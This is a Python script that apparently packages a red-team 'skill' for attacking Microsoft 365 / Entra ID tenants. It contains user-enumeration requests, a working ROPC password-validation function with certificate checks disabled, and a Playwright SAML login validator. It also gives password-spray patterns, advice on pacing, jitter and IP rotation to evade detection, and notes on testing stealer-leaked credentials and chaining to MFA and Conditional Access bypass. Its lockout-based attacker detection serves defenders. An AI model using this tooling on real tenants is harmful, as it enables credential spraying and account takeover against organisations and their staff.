#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AUTO-GENERATED from Cybermes skill: claude-bughunter/m365-entra-attack

Skill: For each owned domain
Desc : Microsoft 365 / Entra ID red-team attack chain — current 2026 reality. AADSTS code reference, user enumeration vectors (with hardening status), Smart Lockout math, Conditional Access bypass options, ROPC + SAML SSO browser flow, Burp/Playwright templates. Built from authorized red-team work where ROPC spray surfaced pre-existing lockouts and CA-blocked credentials, plus real-time external attacker activity correlation. Use for any M365/Entra credential attack, password spray, user enumeration, CA-bypass exploration, or active-attacker-detection scenario.

Run:  python claude-bughunter-m365-entra-attack.py --help
      python claude-bughunter-m365-entra-attack.py --list
      python claude-bughunter-m365-entra-attack.py --dump <section>
"""
import sys, json, argparse

NAME = 'claude-bughunter/m365-entra-attack'
TITLE = 'For each owned domain'
DESCRIPTION = 'Microsoft 365 / Entra ID red-team attack chain — current 2026 reality. AADSTS code reference, user enumeration vectors (with hardening status), Smart Lockout math, Conditional Access bypass options, ROPC + SAML SSO browser flow, Burp/Playwright templates. Built from authorized red-team work where ROPC spray surfaced pre-existing lockouts and CA-blocked credentials, plus real-time external attacker activity correlation. Use for any M365/Entra credential attack, password spray, user enumeration, CA-bypass exploration, or active-attacker-detection scenario.'

PAYLOADS = {
    'main': ["name: m365-entra-attack", "description: Microsoft 365 / Entra ID red-team attack chain \u2014 current 2026 reality. AADSTS code reference, user enumeration vectors (with hardening status), Smart Lockout math, Conditional Access bypass options, ROPC + SAML SSO browser flow, Burp/Playwright templates. Built from authorized red-team work where ROPC spray surfaced pre-existing lockouts and CA-blocked credentials, plus real-time external attacker activity correlation. Use for any M365/Entra credential attack, password spray, user enumeration, CA-bypass exploration, or active-attacker-detection scenario.", "sources: authorized-engagement, microsoft-docs, AADInternals", "report_count: 1"],
    'when-to-use-this-skill': ["Trigger when:", "- Target uses M365 / Entra ID (autodiscover.* records, login.microsoftonline.com redirects, \"Microsoft Office 365\" in tech-stack notes)", "- You have a list of corporate emails or stealer-leaked creds", "- Engagement involves \"credential spray\", \"password spray\", \"Entra attack\", \"ATO via M365\"", "- You see `*.onmicrosoft.com`, `*-my.sharepoint.com`, `enterpriseregistration.*`, `enterpriseenrollment.*` in recon", "- Client mentions \"Conditional Access\", \"MFA bypass\", \"compliant device\"", "DO NOT use for:", "- On-prem-only Active Directory (use a separate AD-attack skill)", "- Service-to-service token attacks (different threat model)", "- Phishing-required attack chains (covered by phishing skills) \u2014 but you can prep for the credential-validation step here"],
    'tenant-discovery-msftrecon': ["```bash"],
    'for-each-owned-domain': ["msftrecon -d client.example", "msftrecon -d clientltd.example", "msftrecon -d sister-brand-school.example", "Key fields in output:", "- **Tenant ID** (different domains may share OR have separate tenants \u2014 always test all owned domains)", "- **Federation Information.Namespace Type** = `Managed` (cloud-only, ROPC works) | `Federated` (ADFS, different attack)", "- **SharePoint Detected** (Yes = OneDrive enum vector available)", "- **Communication Services Teams/Skype** (post-auth lateral targets)", "- **Admin Consent Endpoint accessible** (consent-phishing surface)", "**Red flag:** if the org has multiple Entra tenants for sister domains, each is a separate attack surface with its own user list, lockout policy, and CA configuration. Don't assume one spray covers all."],
    'aadsts-code-reference-memorize': ["**Critical insight:** any code in {53003, 50076, 50079, 50158, 530003} means **the password is correct** \u2014 Microsoft only returns these AFTER successful credential validation. Document as a confirmed-valid finding even if you can't get a token."],
    'smart-lockout-math-the-cap-discipline': ["**Microsoft default policy:**", "- 10 failed sign-ins in 10 minutes \u2192 1-minute lockout", "- 20 failed sign-ins \u2192 progressively longer lockouts (exponential backoff)", "- Counter shared across **ALL auth flows** (ROPC + SAML + IMAP + EWS + SMTP + device-code)", "**Engagement discipline:**", "- Hard cap: \u22642 password attempts per user **lifetime per engagement** (some engagements: 1)", "- State file with atomic writes \u2014 never let two test runs race the counter", "- Kill switch: stop run if more than N LOCKED responses observed (suggests pre-existing attacker activity OR you miscounted; either way pause)", "**Mathematical guarantee:** with 1 attempt per user, **you cannot cause Smart Lockout** (1 < 10). Any AADSTS50053 you see is therefore pre-existing \u2192 use this for active-attacker detection (see `mid-engagement-ir-detection` skill)."],
    'user-enumeration-vectors-hardening-status-may-2026': [],
    'hardened-no-longer-differential': ["```http", "GET /getuserrealm.srf?login=<email>&xml=1", "Returns identical XML for any email matching tenant's owned domain. **Tenant-level only, not user-level.**", "```http", "POST /common/GetCredentialType", "{\"username\":\"<email>\", \"isOtherIdpSupported\":true, ...}", "Returns `AADSTS1659001` (missing flowToken) without proper session \u2014 can't enumerate.", "```http", "GET /autodiscover/autodiscover.json/v1.0/<email>?Protocol=AutodiscoverV1", "Returns identical 200 + same JSON body for any address. Hardened ~2024."],
    'still-works-may-2026-track-shelf-life': ["**OneDrive personal-site differential:**", "```http", "GET /personal/<user>_<domain>_com/_layouts/15/onedrive.aspx HTTP/1.1", "Host: <tenant>-my.sharepoint.com", "- **302 \u2192 user EXISTS** (auth-required redirect to Authenticate.aspx)", "- **404 \u2192 user does NOT exist** (404 FILE NOT FOUND)", "- ZERO authentication attempt \u2192 ZERO lockout impact", "- Bonus: `Sprequestduration` header faster (~40ms) for existing users vs ~600ms for non-existent \u2014 secondary timing oracle", "**Caveats:**", "- Only works if SharePoint is provisioned for the tenant (check msftrecon `SharePoint Detected: Yes`)", "- Microsoft is hardening these endpoints over time \u2014 re-verify before relying on it", "- Some users may exist in Entra without OneDrive provisioning (license-dependent) \u2014 false negatives possible", "**2026-05-17 re-verification (authorized-engagement revalidation):** The OneDrive enum primitive STILL WORKS as of 2026-05-17. Calibration: licensed users return HTTP 200 with ~57KB body; nonexistent users / shared-mailbox accounts return 404 with 0 bytes. The /personal/ root path (without /_layouts/15/onedrive.aspx) returns the same differential.", "**Killer use case: license differential = account-class signal.** Cross-reference OneDrive 200/404 with ROPC AADSTS50034/50126:", "The OneDrive-404 + ROPC-50126 combination is **the signal for \"functional account that might bypass MFA\"** \u2014 admins frequently exempt these from CA policies because they're used by automation that can't satisfy MFA. Discovered usefulness on authorized-engagement revalidation: identified `noreply@`, `purchase@`, `accounts@`, `postmaster@`, `transport@` as functional-account candidates (typical for any conglomerate tenant).", "**ROPC AADSTS50034 / AADSTS50126 differential:**", "- AADSTS50034 (user not exist) does NOT increment Smart Lockout counter", "- AADSTS50126 (wrong password) DOES increment", "- So a 1-attempt-per-user spray can be used as a coarse user-existence enumerator (each AADSTS50034 = miss, each AADSTS50126 = hit + 1 attempt burned)"],
    'conditional-access-bypass-options-most-blocked-document-anyway': ["**Key insight from this engagement:** in a tenant with universal CA policy (compliant device + MFA), all the above paths return AADSTS53003 with the same flow. The cred is valid, but unusable from external. **Phishing-completed cookie steal is the only realistic adversary path.** Document this clearly so the client understands the threat model."],
    'ropc-password-validation-the-canonical-test': ["**Single-attempt validator pattern (Python):**", "```python", "import urllib.request, urllib.parse, ssl, time, json, os", "ctx = ssl.create_default_context(); ctx.check_hostname=False; ctx.verify_mode=ssl.CERT_NONE", "ATTEMPT_FILE = \"engagement_log/o365_attempts.json\"", "HARD_CAP = 1  # or 2 \u2014 never higher", "def attempt(email, password):", "state = json.load(open(ATTEMPT_FILE)) if os.path.exists(ATTEMPT_FILE) else {}", "if state.get(email.lower(), 0) >= HARD_CAP:", "return {\"status\": \"SKIPPED_CAP\"}", "body = urllib.parse.urlencode({", "\"resource\": \"https://graph.windows.net\",", "\"client_id\": \"1b730954-1685-4b74-9bfd-dac224a7b894\",  # Microsoft Graph PowerShell", "\"client_info\": \"1\",", "\"grant_type\": \"password\",", "\"username\": email,", "\"password\": password,", "\"scope\": \"openid\",", "}).encode()", "state[email.lower()] = state.get(email.lower(), 0) + 1", "json.dump(state, open(ATTEMPT_FILE+\".tmp\", \"w\"))", "os.replace(ATTEMPT_FILE+\".tmp\", ATTEMPT_FILE)  # atomic", "req = urllib.request.Request(", "\"https://login.microsoftonline.com/common/oauth2/token\",", "data=body, method=\"POST\",", "req.add_header(\"Content-Type\", \"application/x-www-form-urlencoded\")", "r = urllib.request.urlopen(req, context=ctx, timeout=15)", "body = json.loads(r.read())", "if \"access_token\" in body:    # \u2190 JSON key check, NOT substring", "return {\"status\": \"VALID\", \"body\": body}", "return {\"status\": \"STATUS_200_NO_TOKEN\", \"body\": body}", "except urllib.error.HTTPError as e:", "msg = e.read().decode(errors=\"ignore\")", "for code, status in [", "(\"AADSTS50034\", \"INVALID_USER\"),", "(\"AADSTS50126\", \"INVALID_PW\"),", "(\"AADSTS50053\", \"LOCKED\"),", "(\"AADSTS53003\", \"VALID_CA_BLOCK\"),", "(\"AADSTS50076\", \"VALID_MFA\"),", "(\"AADSTS50079\", \"VALID_MFA\"),", "if code in msg:", "return {\"status\": status, \"code\": code}", "return {\"status\": \"OTHER\", \"msg\": msg[:200]}"],
    'critical-trap-aadsts50076-body-contains-literal-access-token-substring': ["When CA policy requires MFA and ROPC cannot satisfy it, Entra returns an error body that INCLUDES a `claims` field listing CA policy IDs as a step-up challenge:", "```json", "\"error\": \"invalid_grant\",", "\"error_description\": \"AADSTS50076: ...you must use multi-factor authentication...\",", "\"error_codes\": [50076],", "\"suberror\": \"basic_action\",", "\"claims\": \"{\\\"access_token\\\":{\\\"capolids\\\":{\\\"essential\\\":true,\\\"values\\\":[\\\"<policy-id-1>\\\",\\\"<policy-id-2>\\\"]}}}\"", "**The `\"access_token\"` substring appears inside the CA claims challenge JSON.** A loose substring check `if \"access_token\" in raw_body:` will false-positive every MFA-blocked attempt as a successful token issuance.", "**Always parse JSON, then check `if \"access_token\" in parsed_dict:`** \u2014 never substring-match on OAuth error bodies. This was discovered in the 2026-05-17 authorized-engagement revalidation where a substring check produced 7 false-positive \"CA bypasses\" on Sway/Yammer/Bookings/Tunnel client_ids that were actually all enforcing MFA correctly.", "The `claims.access_token.capolids` values are tenant-internal Conditional Access policy IDs \u2014 useful recon enrichment, but NOT a token. Document them in engagement notes as \"CA policy IDs that fired\" \u2014 they're a defender-side breadcrumb, not an attacker-side win.", "**Pace:**", "- **NEVER use concurrency. Single-threaded, serial, paced. This is a hard rule, not a tuning knob.** Entra has an IP-reputation anti-spray layer that is SEPARATE from per-user Smart Lockout. Concurrency \u2014 not attempts-per-user \u2014 is what trips it. Once tripped it returns `AADSTS50053` (LOCKED) en masse for accounts you hit only once (mathematically impossible to be real per-user locks \u2192 they are IP-level rejections), which (a) **contaminates your existence data** \u2014 50053 is now ambiguous and you've burned the 1/user cap so you can't re-test \u2014 and (b) **flags your egress IP as a spray source** in the tenant. Observed live on an authorized engagement: switching from serial to 12 threads produced ~183 false `AADSTS50053` in 15s vs. 1 across 454 paced attempts.", "- The earlier \"\u226430 req/sec is fine\" guidance is MISLEADING for a real tenant \u2014 read it as \"serial with 1.5\u20133s jitter,\" never as \"parallelize up to 30/s.\"", "- Per-user: hard cap from state file is the only thing that matters for lockout-causation; serial pacing is what matters for IP reputation.", "- Random jitter (1.5\u20135s between attempts) for less-machine-like signature.", "- **Kill-switch:** if >~5 `AADSTS50053` appear in a run where your cap is 1/user, STOP \u2014 you've either tripped IP anti-spray (your fault, pace down / rotate IP / wait for cooldown) or detected a real external spray (a finding). Either way, pause and diagnose before continuing."],
    'saml-sso-browser-flow-for-definitive-cred-validation-when-ca-blocks-ropc': ["When ROPC returns AADSTS53003, you've proven the password. To prove it across BOTH auth paths (and capture Microsoft's CA-block page as evidence), walk SAML SSO via Playwright:", "```python", "import asyncio", "from playwright.async_api import async_playwright", "async def saml_validate(target_sp_url, username, password, screenshot_dir):", "async with async_playwright() as p:", "browser = await p.chromium.launch(headless=True, args=[\"--ignore-certificate-errors\"])", "context = await browser.new_context(ignore_https_errors=True)", "page = await context.new_page()", "await page.goto(target_sp_url, wait_until=\"networkidle\", timeout=30000)", "for sel in [\"button:has-text('Sign in')\", \"a:has-text('Login')\", \"button:has-text('Azure')\"]:", "await page.locator(sel).first.click(timeout=3000)", "break", "except: continue", "await page.wait_for_load_state(\"networkidle\", timeout=20000)", "await page.locator('input[name=\"loginfmt\"], input[type=\"email\"]').first.fill(username)", "await page.locator('input[type=\"submit\"], #idSIButton9').first.click()", "await page.wait_for_load_state(\"networkidle\", timeout=20000)", "await page.locator('input[name=\"passwd\"], input[type=\"password\"]').first.fill(password)", "await page.locator('input[type=\"submit\"], #idSIButton9').first.click()", "await page.wait_for_load_state(\"networkidle\", timeout=30000)", "await page.screenshot(path=f\"{screenshot_dir}/saml_final.png\", full_page=True)", "content = await page.content()", "cookies = await context.cookies()", "await browser.close()", "low = content.lower()", "if \"convergedconditionalaccess\" in low or \"53003\" in low:", "return \"CA_BLOCKED\"  # cred valid, CA wall", "elif \"verify your identity\" in low or \"approve sign in\" in low:", "return \"MFA_REQUIRED\"  # cred valid, MFA wall", "elif \"we couldn't sign you in\" in low or \"wrong\" in low:", "return \"INVALID\"", "elif \"<post-auth-landing-marker>\" in low or \"dashboard\" in low:", "return \"FULL_SUCCESS\"  # session obtained (replace marker per target app)", "return \"UNCLEAR\"", "Microsoft's `ConvergedConditionalAccess` page (PageID in source) is the definitive evidence of CA-block."],
    'active-attacker-detection-via-lockout-differential': ["If you see `AADSTS50053` (LOCKED) on multiple users despite your 1-attempt-per-user cap:", "1. **You did not cause these locks** (math: 1 < 10).", "2. **An external attacker is actively spraying the tenant.**", "3. **Cluster the locked users alphabetically \u2014 if they cluster, attacker is using a sorted username list.**", "4. **Diff lockout count between spray-start and spray-end** \u2014 new locks during your session = attacker is active *right now*.", "5. **Document the locked email list as a finding** (SOC actionable \u2014 they pull sign-in logs for those users).", "This is the **highest-impact byproduct** of any M365 spray engagement. Always track and report."],
    'common-password-patterns-to-spray-multi-brand-enterprise-targets': ["- `<BrandName>@<Year>` \u2014 `<Brand>@2026`, `Tata@2026`", "- `<BrandName>@123` \u2014 `<Brand>@123` (very common)", "- `<PlantCity>@<Year>` \u2014 `<City1>@2026`, `<City2>@2026` (production plant cities)", "- `<EmployeeID-as-password>` \u2014 common in legacy apps (PAN number, employee code, phone last4)", "- `Password@<year>`, `Welcome@<year>`, `Admin@<year>` \u2014 generic defaults", "- `<BrandName>@<Y2-digits>` \u2014 `<Brand>@26`", "**Engagement caveat:** when client provides leaked-cred dumps (stealer logs), use those FIRST. Each leaked cred is 1 cap-attempt against the strongest known guess for that user."],
    'engagement-journaling-mandatory': ["Every M365 attempt logs to JSONL:", "```json", "{\"ts\":\"2026-05-08T14:40:53\",\"email\":\"user1@<client>.example\",\"pw_first4\":\"<r4>\",\"status\":\"VALID_CA_BLOCK\",\"code\":\"AADSTS53003\",\"attempts_used\":1}", "**Per-user tracker** (atomic):", "```json", "{\"user1@<client>.example\": 1, \"user2@<client>.example\": 1, ...}", "**IP rotation log** (per-day):", "2026-05-08\t<src-ip>\t<ISP-AS>\t<operator-handle>\tRound 2 spray", "These three artifacts are deliverable evidence for the report. They survive into the next engagement as state."],
    'real-world-findings-template-from-authorized-engagement': ["For the report:", "**Finding: 261 Entra accounts in pre-existing lockout state**", "- Subject: Active external password-spray campaign detected", "- Evidence: `o365_results.jsonl` filtered to `status=LOCKED`", "- Math: 1-attempt-per-user \u00d7 261 LOCKED \u2260 our doing", "- SOC action: pull sign-in logs for these 261 accounts over last 30-60 days", "**Finding: Valid M365 cred \u2014 `<user>:<password>` (CA-blocked)**", "- Subject: Confirmed valid credential", "- Evidence: ROPC AADSTS53003 + SAML SSO `ConvergedConditionalAccess` page screenshot", "- Microsoft documentation excerpt: \"AADSTS53003 returned only after password validation\"", "- Recommendation: force password reset, audit org-wide for similar pattern"],
    'anti-patterns-don-t-do-these': ["- **DON'T use the leaked cred for the user across multiple resources** \u2014 burns the cap with no marginal benefit when CA blocks all paths", "- **DON'T retry after AADSTS50053** \u2014 account is locked, you'll just see lockout again", "- **DON'T parallelize ROPC/auth requests AT ALL** \u2014 serial + paced only. Concurrency trips Entra's IP-reputation anti-spray (separate from Smart Lockout), floods false `AADSTS50053`, contaminates results, and flags your IP. \"Going faster\" by adding threads costs more than it saves. The only safe speed-up is removing dead/nonexistent users first (small `GetCredentialType` batches <60), not raising concurrency.", "- **DON'T forget to test ALL Entra tenants** \u2014 sister domains often have separate tenants with different password policies", "- **DON'T retract a CA-block finding** \u2014 AADSTS53003 means the password is correct; that's the whole point"],
    'tooling': ["```bash", "pip install --break-system-packages msftrecon o365spray  # may need to clone msftrecon from GitHub", "brew install pandoc                                       # for report generation", "go install -v github.com/projectdiscovery/...             # PD toolkit for general recon", "Pre-built `m365_validator.py` template at engagement working directory `engagement_log/m365_validator.py`. Adapt the `attempt()` function to your engagement."],
    'related-skills-chains': ["- **`hunt-mfa-bypass`** \u2014 AADSTS50053 (lockout) vs AADSTS50126 (bad password) vs AADSTS50076 (MFA required) is a free factor-presence oracle. Chain primitive: M365 AADSTS50053 lockout differential observed \u2192 user has MFA but no CA enforcement on legacy auth \u2192 `hunt-mfa-bypass` factor-probe (SMS fallback, voice fallback, OAuth device-code flow, ROPC against legacy endpoint) \u2192 Conditional Access bypass via legacy-protocol path.", "- **`hunt-ntlm-info`** \u2014 On-prem NTLM topology leak feeds the Entra spray. Chain primitive: SharePoint/Exchange/IIS anon NTLM Type-2 \u2192 AV_PAIR decode yields `corp.example.com` \u2192 `m365-entra-attack` resolves Entra tenant via openid-configuration \u2192 ROPC spray with realistic UPN format.", "- **`okta-attack`** \u2014 Hybrid orgs run Okta-as-IdP federated into Entra. Chain primitive: M365 `getuserrealm` returns `NameSpaceType: Federated` with AuthURL pointing to `*.okta.com` \u2192 pivot to `okta-attack` for tenant enumeration \u2192 Okta ATO \u2192 SAML assertion to Entra \u2192 full M365 access.", "- **`hunt-saml`** \u2014 Federated tenants accept signed SAML assertions; XSW or signature-stripping on the federated IdP bypasses Entra's controls entirely. Chain primitive: `getuserrealm` reveals federation \u2192 IdP fingerprinted (ADFS / Okta / PingFederate) \u2192 `hunt-saml` XSW1-XSW8 against IdP's `/adfs/ls/` or equivalent \u2192 forged assertion \u2192 Entra grants access.", "- **`redteam-report-template`** \u2014 M365 findings need clear tenant/user/CA-policy framing because the blast radius is \"every Microsoft service the org uses.\" Chain primitive: validated finding from this skill \u2192 run through `triage-validation` 7-Question Gate \u2192 package via `redteam-report-template` with explicit blast-radius (which apps, which users, which data) for client deliverable."],
}

def main():
    ap = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("--list", action="store_true", help="list sections")
    ap.add_argument("--dump", metavar="SECTION", help="dump payloads for a section")
    ap.add_argument("--search", metavar="KEYWORD", help="search payloads")
    args = ap.parse_args()
    if args.list or not (args.dump or args.search):
        print("=== %s ===" % TITLE)
        print(DESCRIPTION)
        print()
        print("Sections (%d):" % len(PAYLOADS))
        for k in PAYLOADS:
            print("  -", k, "(%d payloads)" % len(PAYLOADS[k]))
        if args.list:
            return
    if args.dump:
        if args.dump not in PAYLOADS:
            print("Section not found. Available:", list(PAYLOADS.keys()))
            sys.exit(1)
        for p in PAYLOADS[args.dump]:
            print(p)
        return
    if args.search:
        q = args.search.lower()
        hits = 0
        for k, v in PAYLOADS.items():
            for p in v:
                if q in p.lower():
                    print("[%s] %s" % (k, p))
                    hits += 1
        print("\n%d hits" % hits)
        return

if __name__ == "__main__":
    main()